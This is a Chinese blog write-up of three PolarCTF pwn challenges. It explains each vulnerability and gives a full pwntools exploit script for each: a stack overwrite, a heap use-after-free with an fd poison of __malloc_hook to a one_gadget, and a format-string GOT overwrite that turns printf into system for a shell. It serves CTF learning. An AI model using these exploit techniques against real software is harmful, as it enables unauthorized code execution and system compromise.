Polarctf-pwn(中等)
|
文章
|
92

603 字
|
12 分钟
本文最后更新于62 天前,其中的信息可能已经过时,如有错误请发送邮件到1797527477@qq.com

what’s your name

image-20250821120100969

一道比较简单的题,代码很简单,只要满足条件就能获得flag,重点关注strcmp,要让if条件成立则需让c中的内容为tznb

image-20250821120315402

可以看到,b与c挨得很近且read函数允许输入的长度可以覆盖到c,那么就能将c改成题目所需的条件

exp

from pwn import*
context(arch='i386',os='linux',log_level='debug')

p=remote('1.95.36.136',2095)
#p=process('./pwn2')
payload=b'a'*4+b'tznb'
p.send(payload)

p.interactive()

但是这里有个注意的点是发送payload时要用send而不是sendline,这样才能去除’\n’的干扰

image-20250821120705164

巴啦啦亮吗

一道菜单题,逻辑很简单,这里我们重点关注delete函数和edit函数

image-20251216205648323

很显然delete函数释放后指针没有清零,可以构成二次利用

image-20251216205821687

edit函数才是重中之重,函数里可以让我们重新输入数据的大小,据此可以改成更大的chunk覆盖下一个chunk,如果下一个chunk是free状态,那么就能篡改其fd指针为__malloc_hook并改变其中内容,实现one_gadget劫持

此外这道题引入了tcachebin,但实际的做法和fastbin差不多,首先就是申请一个大于tcachebin最大大小的chunk,使其free后能进入Unsortedbin,从而泄露libc,得到onegadget,并将onegadget写入___malloc_hook

exp

from pwn import*
from LibcSearcher import*
context(arch='amd64',os='linux',log_level='debug')
 
p=remote('1.95.36.136',2077)
#p = process(['./ld-linux-x86-64.so.2', '--library-path', '.', './pwn1'])
elf=ELF('./pwn1')
libc=ELF('./libc.so.6')
 
def debug():
  gdb.attach(p)
  pause()
 
def add(index,size):
  p.recvuntil(b'choice:')
  p.sendline(b'1')
  p.recvuntil(b'index:')
  p.sendline(str(index))
  p.recvuntil(b'size:')
  p.sendline(str(size))
  
def delete(index):
  p.recvuntil(b'choice:')
  p.sendline(b'2')
  p.recvuntil(b'index:')
  p.sendline(str(index))
  
def edit(index,length,content):
  p.recvuntil(b'choice:')
  p.sendline(b'3')
  p.recvuntil(b'index:')
  p.sendline(str(index))
  p.recvuntil(b'length:')
  p.sendline(str(length))
  p.recvuntil(b'content:')
  p.sendline(content)
  
def show(index):
  p.recvuntil(b'choice:')
  p.sendline(b'4')
  p.recvuntil(b'index:')
  p.sendline(str(index))


add(0,0x410)
add(1,0x60)
add(2,0x60)
delete(0)
add(0,0x410)

show(0)

libc_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
info('libc_addr>'+hex(libc_addr))

padding=0x3afca0
libc_base=libc_addr-padding
info('libc_base>'+hex(libc_base))
delete(2)
#debug()
edit(1,0x60+0x10+0x8,b'\x00'*(0x68)+p64(71)+p64(libc.sym['__malloc_hook']+libc_base-0x23))
#debug()
add(0,0x60)
add(1,0x60)
one_gadget=[0x41612,0x41666,0xdeed2]
one_gadget=one_gadget[2]+libc_base
#debug()
edit(1,0x20+0x3+0x8,b'a'*0x23+p64(one_gadget))

add(0,b'aaa')
 
p.interactive()

fmt_text

一道简单的got劫持题

image-20250909173447440

首先确定我们输入的内容位于栈中的哪个位置,直接执行输入aaaa %p %p …发现是第6个

程序给了system那么很明显就是要我们输入/bin/sh然后执行,第一次读入直接利用fmtstr_payload这个函数劫持printf_got为system_plt(这个方法限于32位,64位由于字节较多需要手动改)

第二次输入/bin/sh传参相当于执行system

exp

from pwn import*

context(arch='i386',os='linux',log_level='debug')
p=remote('1.95.36.136',2066)
elf=ELF('./pwn')
printf_got=elf.got['printf']
system_plt=elf.plt['system']

payload=fmtstr_payload(6,{printf_got:system_plt})
p.sendline(payload)

p.sendline(b'/bin/sh')
p.interactive()
忧思在我的心里平静下去,正如傍晚的暮色降临在寂静的山林之中。
CTF二进制
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
Polarctf-pwn(简单)

							
							

							
Polarctf-pwn(困难)